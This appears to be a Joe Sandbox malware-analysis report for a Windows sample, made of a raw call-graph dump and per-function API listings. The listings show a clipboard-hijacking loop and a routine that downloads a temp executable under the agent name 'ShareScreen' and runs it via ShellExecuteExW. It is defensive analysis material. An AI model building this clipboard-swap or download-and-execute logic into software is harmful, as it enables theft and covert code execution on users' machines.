20 API calls __dosmaperr 65412->65425 65417 439968 65413->65417 65426 42eab6 20 API calls __dosmaperr 65413->65426 65415 439973 65427 42eac9 20 API calls __dosmaperr 65415->65427 65417->65394 65419 43993b 65419->65394 65420 43997b 65428 42a59d 26 API calls _Deallocate 65420->65428 65422->65398 65423->65398 65424->65412 65425->65419 65426->65415 65427->65420 65428->65419 65429 af9004 65430 af9071 65429->65430 65433 af9816 65430->65433 65434 af9825 65433->65434 65437 af9fb6 65434->65437 65438 af9fd1 65437->65438 65439 af9fda CreateToolhelp32Snapshot 65438->65439 65440 af9ff6 Module32First 65438->65440 65439->65438 65439->65440 65441 af9815 65440->65441 65442 afa005 65440->65442 65444 af9c75 65442->65444 65445 af9ca0 65444->65445 65446 af9cb1 VirtualAlloc 65445->65446 65447 af9ce9 65445->65447 65446->65447 65448 4332de 65449 4332eb 65448->65449 65453 433303 65448->65453 65498 42eac9 20 API calls __dosmaperr 65449->65498 65451 4332f0 65499 42a59d 26 API calls _Deallocate 65451->65499 65454 43335e 65453->65454 65462 4332fb 65453->65462 65500 434ccd 21 API calls 2 library calls 65453->65500 65456 432908 __fread_nolock 26 API calls 65454->65456 65457 433376 65456->65457 65468 432e16 65457->65468 65459 43337d 65460 432908 __fread_nolock 26 API calls 65459->65460 65459->65462 65461 4333a9 65460->65461 65461->65462 65463 432908 __fread_nolock 26 API calls 65461->65463 65464 4333b7 65463->65464 65464->65462 65465 432908 __fread_nolock 26 API calls 65464->65465 65466 4333c7 65465->65466 65467 432908 __fread_nolock 26 API calls 65466->65467 65467->65462 65469 432e22 BuildCatchObjectHelperInternal 65468->65469 65470 432e2a 65469->65470 65475 432e42 65469->65475 65567 42eab6 20 API calls __dosmaperr 65470->65567 65472 432f08 65574 42eab6 20 API calls __dosmaperr 65472->65574 65474 432e2f 65568 42eac9 20 API calls __dosmaperr 65474->65568 65475->65472 65478 432e7b 65475->65478 65476 432f0d 65575 42eac9 20 API calls __dosmaperr 65476->65575 65480 432e8a 65478->65480 65481 432e9f 
65478->65481 65569 42eab6 20 API calls __dosmaperr 65480->65569 65501 4396a4 EnterCriticalSection 65481->65501 65483 432e97 65576 42a59d 26 API calls _Deallocate 65483->65576 65485 432e8f 65570 42eac9 20 API calls __dosmaperr 65485->65570 65486 432ea5 65488 432ec1 65486->65488 65489 432ed6 65486->65489 65571 42eac9 20 API calls __dosmaperr 65488->65571 65502 432f29 65489->65502 65491 432e37 std::_Locinfo::_Locinfo_dtor 65491->65459 65494 432ec6 65572 42eab6 20 API calls __dosmaperr 65494->65572 65495 432ed1 65573 432f00 LeaveCriticalSection __wsopen_s 65495->65573 65498->65451 65499->65462 65500->65454 65501->65486 65503 432f53 65502->65503 65504 432f3b 65502->65504 65506 4332bd 65503->65506 65511 432f98 65503->65511 65586 42eab6 20 API calls __dosmaperr 65504->65586 65604 42eab6 20 API calls __dosmaperr 65506->65604 65507 432f40 65587 42eac9 20 API calls __dosmaperr 65507->65587 65510 4332c2 65605 42eac9 20 API calls __dosmaperr 65510->65605 65513 432fa3 65511->65513 65514 432f48 65511->65514 65519 432fd3 65511->65519 65588 42eab6 20 API calls __dosmaperr 65513->65588 65514->65495 65515 432fb0 65606 42a59d 26 API calls _Deallocate 65515->65606 65517 432fa8 65589 42eac9 20 API calls __dosmaperr 65517->65589 65521 432fec 65519->65521 65522 433012 65519->65522 65523 43302e 65519->65523 65521->65522 65527 432ff9 65521->65527 65590 42eab6 20 API calls __dosmaperr 65522->65590 65593 4336a7 21 API calls 3 library calls 65523->65593 65526 433017 65591 42eac9 20 API calls __dosmaperr 65526->65591 65577 43d365 65527->65577 65528 433045 65531 43346a _free 20 API calls 65528->65531 65536 43304e 65531->65536 65532 433197 65534 43320d 65532->65534 65537 4331b0 GetConsoleMode 65532->65537 65533 43301e 65592 42a59d 26 API calls _Deallocate 65533->65592 65539 433211 ReadFile 65534->65539 65538 43346a _free 20 API calls 65536->65538 65537->65534 65540 4331c1 65537->65540 65541 433055 65538->65541 65542 433285 GetLastError 65539->65542 65543 43322b 65539->65543 65540->65539 65545 
4331c7 ReadConsoleW 65540->65545 65546 43307a 65541->65546 65547 43305f 65541->65547 65548 433292 65542->65548 65549 4331e9 65542->65549 65543->65542 65544 433202 65543->65544 65559 433250 65544->65559 65560 433267 65544->65560 65564 433029 __fread_nolock 65544->65564 65545->65544 65552 4331e3 GetLastError 65545->65552 65596 4347ee 65546->65596 65594 42eac9 20 API calls __dosmaperr 65547->65594 65602 42eac9 20 API calls __dosmaperr 65548->65602 65549->65564 65599 42ea93 20 API calls 3 library calls 65549->65599 65552->65549 65553 43346a _free 20 API calls 65553->65514 65555 433297 65603 42eab6 20 API calls __dosmaperr 65555->65603 65557 433064 65595 42eab6 20 API calls __dosmaperr 65557->65595 65600 432c45 31 API calls 3 library calls 65559->65600 65563 43327e 65560->65563 65560->65564 65601 432a85 29 API calls __fread_nolock 65563->65601 65564->65553 65566 433283 65566->65564 65567->65474 65568->65491 65569->65485 65570->65483 65571->65494 65572->65495 65573->65491 65574->65476 65575->65483 65576->65491 65578 43d372 65577->65578 65579 43d37f 65577->65579 65607 42eac9 20 API calls __dosmaperr 65578->65607 65583 43d38b 65579->65583 65608 42eac9 20 API calls __dosmaperr 65579->65608 65582 43d377 65582->65532 65583->65532 65584 43d3ac 65609 42a59d 26 API calls _Deallocate 65584->65609 65586->65507 65587->65514 65588->65517 65589->65515 65590->65526 65591->65533 65592->65564 65593->65528 65594->65557 65595->65564 65597 434755 __fread_nolock 28 API calls 65596->65597 65598 434804 65597->65598 65598->65527 65599->65564 65600->65564 65601->65566 65602->65555 65603->65564 65604->65510 65605->65515 65606->65514 65607->65582 65608->65584 65609->65582 65610 402bad RegCreateKeyExW 65611 402bdb RegSetValueExW 65610->65611 65612 402bef 65610->65612 65611->65612 65613 402bf4 RegCloseKey 65612->65613 65614 402bfd 65612->65614 65613->65614 65615 404b8e 65616 404b9a Concurrency::details::_TaskCollection::_Alias 65615->65616 65621 40fb0c 65616->65621 65620 404bba 
Concurrency::details::_TaskCollection::_Alias Concurrency::details::LockQueueNode::DerefTimerNode 65623 40fb11 65621->65623 65624 404ba3 65623->65624 65626 40fb2d Concurrency::details::_TaskCollection::_Alias 65623->65626 65645 42ad7e 65623->65645 65652 42f450 7 API calls 2 library calls 65623->65652 65629 4051d0 65624->65629 65653 42860d RaiseException 65626->65653 65628 4103cc 65630 4051dc Concurrency::details::_TaskCollection::_Alias __Cnd_init 65629->65630 65632 4051f4 __Mtx_init 65630->65632 65664 40ce32 28 API calls std::_Throw_Cpp_error 65630->65664 65633 40521b 65632->65633 65665 40ce32 28 API calls std::_Throw_Cpp_error 65632->65665 65656 4010ea 65633->65656 65639 40526a 65640 40527f Concurrency::details::LockQueueNode::DerefTimerNode 65639->65640 65667 401128 30 API calls std::_Cnd_waitX 65639->65667 65668 401109 65640->65668 65644 4052a4 Concurrency::details::_TaskCollection::_Alias 65644->65620 65650 4336a7 _Atexit 65645->65650 65646 4336e5 65655 42eac9 20 API calls __dosmaperr 65646->65655 65648 4336d0 RtlAllocateHeap 65649 4336e3 65648->65649 65648->65650 65649->65623 65650->65646 65650->65648 65654 42f450 7 API calls 2 library calls 65650->65654 65652->65623 65653->65628 65654->65650 65655->65649 65672 40d313 65656->65672 65659 401103 65661 40cef3 65659->65661 65696 42e114 65661->65696 65664->65632 65665->65633 65666 40ce32 28 API calls std::_Throw_Cpp_error 65666->65639 65667->65639 65669 401115 __Mtx_unlock 65668->65669 65670 401122 65669->65670 66024 40ce32 28 API calls std::_Throw_Cpp_error 65669->66024 65670->65644 65676 40d06d 65672->65676 65675 40ce32 28 API calls std::_Throw_Cpp_error 65675->65659 65677 40d0c3 65676->65677 65678 40d095 GetCurrentThreadId 65676->65678 65679 40d0c7 GetCurrentThreadId 65677->65679 65680 40d0ed 65677->65680 65681 40d0a0 GetCurrentThreadId 65678->65681 65691 40d0bb 65678->65691 65683 40d0d6 65679->65683 65682 40d186 GetCurrentThreadId 65680->65682 65686 40d10d 65680->65686 65681->65691 65682->65683 65684 40d1dd 
GetCurrentThreadId 65683->65684 65683->65691 65684->65691 65685 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65689 4010f6 65685->65689 65694 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65686->65694 65689->65659 65689->65675 65690 40d145 GetCurrentThreadId 65690->65683 65692 40d118 __Xtime_diff_to_millis2 65690->65692 65691->65685 65692->65683 65692->65690 65692->65691 65695 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65692->65695 65694->65692 65695->65692 65697 42e121 65696->65697 65698 42e135 65696->65698 65719 42eac9 20 API calls __dosmaperr 65697->65719 65710 42e0cb 65698->65710 65701 42e126 65720 42a59d 26 API calls _Deallocate 65701->65720 65704 42e14a CreateThread 65706 42e175 65704->65706 65707 42e169 GetLastError 65704->65707 65741 42dfc0 65704->65741 65705 405257 65705->65639 65705->65666 65722 42e03d 65706->65722 65721 42ea93 20 API calls 3 library calls 65707->65721 65730 434d2a 65710->65730 65713 43346a _free 20 API calls 65714 42e0e4 65713->65714 65715 42e103 65714->65715 65716 42e0eb GetModuleHandleExW 65714->65716 65717 42e03d __Thrd_start 22 API calls 65715->65717 65716->65715 65718 42e10d 65717->65718 65718->65704 65718->65706 65719->65701 65720->65705 65721->65706 65723 42e04a 65722->65723 65724 42e06e 65722->65724 65725 42e050 CloseHandle 65723->65725 65726 42e059 65723->65726 65724->65705 65725->65726 65727 42e068 65726->65727 65728 42e05f FreeLibrary 65726->65728 65729 43346a _free 20 API calls 65727->65729 65728->65727 65729->65724 65731 434d37 65730->65731 65732 434d77 65731->65732 65733 434d62 HeapAlloc 65731->65733 65738 434d4b _Atexit 65731->65738 65740 42eac9 20 API calls __dosmaperr 65732->65740 65734 434d75 65733->65734 65733->65738 65736 42e0db 65734->65736 65736->65713 65738->65732 65738->65733 65739 42f450 7 API calls 2 library calls 65738->65739 65739->65738 65740->65736 65742 42dfcc _Atexit 65741->65742 65743 42dfd3 GetLastError ExitThread 65742->65743 65744 
42dfe0 65742->65744 65757 431eda GetLastError 65744->65757 65746 42dfe5 65777 435571 65746->65777 65750 42dffb 65784 401169 65750->65784 65758 431ef0 65757->65758 65759 431ef6 65757->65759 65792 435111 11 API calls 2 library calls 65758->65792 65761 434d2a _Atexit 20 API calls 65759->65761 65763 431f45 SetLastError 65759->65763 65762 431f08 65761->65762 65764 431f10 65762->65764 65793 435167 11 API calls 2 library calls 65762->65793 65763->65746 65766 43346a _free 20 API calls 65764->65766 65768 431f16 65766->65768 65767 431f25 65767->65764 65769 431f2c 65767->65769 65770 431f51 SetLastError 65768->65770 65794 431d4c 20 API calls _Atexit 65769->65794 65795 42df7d 167 API calls _Atexit 65770->65795 65772 431f37 65774 43346a _free 20 API calls 65772->65774 65776 431f3e 65774->65776 65775 431f5d 65776->65763 65776->65770 65778 435596 65777->65778 65779 43558c 65777->65779 65796 434e93 5 API calls 2 library calls 65778->65796 65781 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65779->65781 65782 42dff0 65781->65782 65782->65750 65791 4354a4 10 API calls 2 library calls 65782->65791 65783 4355ad 65783->65779 65797 40155a Sleep 65784->65797 65799 405800 65784->65799 65785 401173 65788 42e199 65785->65788 65992 42e074 65788->65992 65790 42e1a6 65791->65750 65792->65759 65793->65767 65794->65772 65795->65775 65796->65783 65798 4016d5 65797->65798 65800 40580c Concurrency::details::_TaskCollection::_Alias 65799->65800 65801 4010ea std::_Cnd_initX 35 API calls 65800->65801 65802 405821 __Cnd_signal 65801->65802 65803 405839 65802->65803 65856 40ce32 28 API calls std::_Throw_Cpp_error 65802->65856 65805 401109 std::_Cnd_initX 28 API calls 65803->65805 65806 405842 65805->65806 65812 4016df 65806->65812 65833 4029f4 InternetOpenW 65806->65833 65809 405849 Concurrency::details::_TaskCollection::_Alias Concurrency::details::LockQueueNode::DerefTimerNode 65809->65785 65857 40fde6 65812->65857 65814 4016eb Sleep 65858 40cc10 65814->65858 
65817 40cc10 28 API calls 65818 401711 65817->65818 65819 40171b OpenClipboard 65818->65819 65820 401943 Sleep 65819->65820 65821 40172b GetClipboardData 65819->65821 65820->65819 65822 40173b GlobalLock 65821->65822 65823 40193d CloseClipboard 65821->65823 65822->65823 65827 401748 _strlen 65822->65827 65823->65820 65824 40cc10 28 API calls 65824->65827 65826 4018d2 EmptyClipboard GlobalAlloc 65826->65827 65828 4018eb GlobalLock 65826->65828 65827->65823 65827->65824 65827->65826 65830 40cbc7 28 API calls std::system_error::system_error 65827->65830 65862 402e66 167 API calls 2 library calls 65827->65862 65864 40caa6 26 API calls _Deallocate 65827->65864 65863 426990 65828->65863 65830->65827 65832 401905 GlobalUnlock SetClipboardData GlobalFree 65832->65827 65834 402a27 InternetOpenUrlW 65833->65834 65835 402b9c 65833->65835 65834->65835 65836 402a3d GetTempPathW GetTempFileNameW 65834->65836 65838 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65835->65838 65870 42a88e 65836->65870 65840 402bab 65838->65840 65849 40e76b 65840->65849 65841 402b8b InternetCloseHandle InternetCloseHandle 65841->65835 65842 402aa8 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65843 402ac0 InternetReadFile WriteFile 65842->65843 65844 402b00 CloseHandle 65842->65844 65843->65842 65872 402960 65844->65872 65847 402b2b ShellExecuteExW 65847->65841 65848 402b72 WaitForSingleObject CloseHandle 65847->65848 65848->65841 65983 40deea 65849->65983 65854 40e810 65854->65809 65855 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65990 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65855->65990 65856->65803 65857->65814 65859 40cc2c _strlen 65858->65859 65865 40cbc7 65859->65865 65861 401704 65861->65817 65862->65827 65863->65832 65864->65827 65866 40cbd6 BuildCatchObjectHelperInternal 65865->65866 65867 40cbfa 65865->65867 65866->65861 65867->65866 65869 40cb5c 28 API calls 4 library calls 65867->65869 
65869->65866 65871 402a76 CreateFileW 65870->65871 65871->65841 65871->65842 65873 40298b _wcslen Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65872->65873 65882 42b454 65873->65882 65877 4029b8 65904 404333 65877->65904 65880 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65881 4029f2 65880->65881 65881->65841 65881->65847 65908 42b106 65882->65908 65885 402823 65886 402832 Concurrency::details::_TaskCollection::_Alias 65885->65886 65934 4032dd 65886->65934 65888 402846 65950 403b8b 65888->65950 65890 40285a 65891 402888 65890->65891 65892 40286c 65890->65892 65956 403112 65891->65956 65977 40329a 167 API calls 65892->65977 65895 402895 65959 403c20 65895->65959 65897 4028a7 65969 403cc2 65897->65969 65899 40287f std::ios_base::_Ios_base_dtor Concurrency::details::_TaskCollection::_Alias 65899->65877 65900 4028c4 65901 404333 26 API calls 65900->65901 65902 4028e3 65901->65902 65978 40329a 167 API calls 65902->65978 65905 4029e4 65904->65905 65906 40433b 65904->65906 65905->65880 65979 40cc96 65906->65979 65909 42b133 65908->65909 65910 42b142 65909->65910 65911 42b15a 65909->65911 65927 42b137 65909->65927 65912 42eac9 __Strcoll 20 API calls 65910->65912 65913 42a747 __fassign 162 API calls 65911->65913 65914 42b147 65912->65914 65916 42b165 65913->65916 65917 42a59d pre_c_initialization 26 API calls 65914->65917 65915 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65918 4029a4 65915->65918 65919 42b170 65916->65919 65920 42b307 65916->65920 65917->65927 65918->65885 65923 42b218 WideCharToMultiByte 65919->65923 65929 42b1b5 WideCharToMultiByte 65919->65929 65930 42b17b 65919->65930 65921 42b334 WideCharToMultiByte 65920->65921 65922 42b312 65920->65922 65921->65922 65925 42eac9 __Strcoll 20 API calls 65922->65925 65922->65927 65926 42b243 65923->65926 65923->65930 65925->65927 65928 42b24c GetLastError 65926->65928 65926->65930 65927->65915 65928->65930 65933 
42b25b 65928->65933 65929->65930 65930->65927 65931 42eac9 __Strcoll 20 API calls 65930->65931 65931->65927 65932 42b274 WideCharToMultiByte 65932->65922 65932->65933 65933->65922 65933->65927 65933->65932 65935 4032e9 Concurrency::details::_TaskCollection::_Alias 65934->65935 65936 40467c 167 API calls 65935->65936 65937 403315 65936->65937 65938 40484d 167 API calls 65937->65938 65939 40333e 65938->65939 65940 40458c 26 API calls 65939->65940 65941 40334d 65940->65941 65942 403392 std::ios_base::_Ios_base_dtor 65941->65942 65943 40dde3 167 API calls 65941->65943 65944 40c618 167 API calls 65942->65944 65945 4033ce Concurrency::details::_TaskCollection::_Alias 65942->65945 65946 403362 65943->65946 65944->65945 65945->65888 65946->65942 65947 40458c 26 API calls 65946->65947 65948 403373 65947->65948 65949 404c14 167 API calls 65948->65949 65949->65942 65951 403b97 Concurrency::details::_TaskCollection::_Alias 65950->65951 65952 4042af 167 API calls 65951->65952 65953 403ba3 65952->65953 65954 403bc7 Concurrency::details::_TaskCollection::_Alias 65953->65954 65955 4034fb 167 API calls 65953->65955 65954->65890 65955->65954 65957 404356 28 API calls 65956->65957 65958 40312c Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65957->65958 65958->65895 65960 403c2c Concurrency::details::_TaskCollection::_Alias 65959->65960 65961 40c618 167 API calls 65960->65961 65962 403c4f 65961->65962 65963 4042af 167 API calls 65962->65963 65964 403c59 65963->65964 65965 403c9c Concurrency::details::_TaskCollection::_Alias 65964->65965 65968 4034fb 167 API calls 65964->65968 65965->65897 65966 403c7a 65966->65965 65967 4046ca 167 API calls 65966->65967 65967->65965 65968->65966 65970 403cce __EH_prolog3_catch 65969->65970 65971 4042af 167 API calls 65970->65971 65973 403ce7 65971->65973 65972 4046ca 167 API calls 65974 403d70 Concurrency::details::_TaskCollection::_Alias 65972->65974 65975 403d17 65973->65975 65976 40369f 40 API calls 65973->65976 65974->65900 
65975->65972 65976->65975 65977->65899 65978->65899 65980 40cca3 65979->65980 65981 40ccb0 Concurrency::details::LockQueueNode::DerefTimerNode 65979->65981 65982 40cc72 _Deallocate 26 API calls 65980->65982 65981->65905 65982->65981 65991 40f22a EnterCriticalSection 65983->65991 65985 40def4 65986 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65985->65986 65987 40ced2 65986->65987 65988 40cec7 CloseHandle 65986->65988 65989 40ced6 GetCurrentThreadId 65987->65989 65988->65989 65989->65855 65990->65854 65991->65985 66001 431f5e GetLastError 65992->66001 65994 42e083 ExitThread 65995 42e0a1 65998 42e0b4 65995->65998 65999 42e0ad CloseHandle 65995->65999 65998->65994 66000 42e0c0 FreeLibraryAndExitThread 65998->66000 65999->65998 66002 431f7d 66001->66002 66003 431f77 66001->66003 66005 434d2a _Atexit 17 API calls 66002->66005 66007 431fd4 SetLastError 66002->66007 66021 435111 11 API calls 2 library calls 66003->66021 66006 431f8f 66005->66006 66008 431f97 66006->66008 66022 435167 11 API calls 2 library calls 66006->66022 66010 42e07f 66007->66010 66012 43346a _free 17 API calls 66008->66012 66010->65994 66010->65995 66020 4354f6 10 API calls 2 library calls 66010->66020 66011 431fac 66011->66008 66014 431fb3 66011->66014 66013 431f9d 66012->66013 66015 431fcb SetLastError 66013->66015 66023 431d4c 20 API calls _Atexit 66014->66023 66015->66010 66017 431fbe 66018 43346a _free 17 API calls 66017->66018 66019 431fc4 66018->66019 66019->66007 66019->66015 66020->65995 66021->66002 66022->66011 66023->66017 66024->65670 66025 40239e 66026 402561 PostQuitMessage 66025->66026 66027 4023b2 66025->66027 66028 40255f 66026->66028 66029 4023b9 DefWindowProcW 66027->66029 66030 4023d0 66027->66030 66029->66028 66030->66028 66031 4029f4 167 API calls 66030->66031 66031->66028

                                                    Control-flow Graph

                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                    • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                      • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                    • OpenClipboard.USER32(00000000), ref: 0040171D
                                                    • GetClipboardData.USER32(00000001), ref: 0040172D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                    • _strlen.LIBCMT ref: 00401749
                                                    • _strlen.LIBCMT ref: 00401778
                                                    • _strlen.LIBCMT ref: 004018BC
                                                    • EmptyClipboard.USER32 ref: 004018D2
                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                    • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                    • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                    • CloseClipboard.USER32 ref: 0040193D
                                                    • Sleep.KERNEL32(000002D2), ref: 00401948
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                    • String ID: i
                                                    • API String ID: 1583243082-3865851505
                                                    • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                    • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                    • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                    • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                    Control-flow Graph

                                                    APIs
                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                    • CloseHandle.KERNEL32(?), ref: 00402B89
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                    • String ID: .exe$<$ShareScreen
                                                    • API String ID: 3323492106-493228180
                                                    • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                    • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                    • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                    • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AF9FDE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00AF9FFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 03b362eaa5bc82ebe12e820efe5214a138a326eb4c9564ae3ea1b45e7aa5df77
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 9FF04932600719ABD7202BE9A98DBBBB6E8AF59725F100629F747D1480DA70E8458A61

                                                    Control-flow Graph

                                                    control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 99 43d1b4-43d1b7 92->99 100 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->100 97 43d102-43d106 93->97 98 43d137-43d15d GetLastError call 42ea93 93->98 97->98 103 43d108-43d135 call 43cd0a 97->103 98->83 101 43d1c0-43d1c6 99->101 102 43d1b9-43d1be 99->102 100->83 111 43d1a4-43d1af call 42eac9 100->111 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->98 117 43d21a-43d226 call 43cf1b 106->117 118 43d228-43d24c call 43cabd 106->118 107->106 111->83 117->118 125 43d250-43d25a call 4335cd 117->125 123 43d25f-43d2a2 118->123 124 43d24e 118->124 127 43d2c3-43d2d1 123->127 128 43d2a4-43d2a8 123->128 124->125 125->94 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                    APIs
                                                      • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                    • GetLastError.KERNEL32 ref: 0043D150
                                                    • __dosmaperr.LIBCMT ref: 0043D157
                                                    • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                    • GetLastError.KERNEL32 ref: 0043D16D
                                                    • __dosmaperr.LIBCMT ref: 0043D176
                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                    • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                    Control-flow Graph

                                                    control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 160 4332d5 144->160 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->166 158 432fc3-432fc7 157->158 159 4332b9-4332bb 157->159 158->159 164 432fcd-432fd1 158->164 165 4332d8-4332dd 159->165 160->165 164->156 168 432fd3-432fea 164->168 166->160 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 204 4331f0 175->204 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 213 43307a-4330a0 call 4347ee 178->213 214 43305f-433075 call 42eac9 call 42eab6 178->214 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 193 43320d 182->193 194 43319c-4331ae 182->194 185->182 189 4330e1-433107 185->189 189->182 196 43310d-433120 189->196 202 433211-433229 ReadFile 193->202 194->193 198 4331b0-4331bf GetConsoleMode 194->198 196->182 200 433122-433124 196->200 198->193 203 4331c1-4331c5 198->203 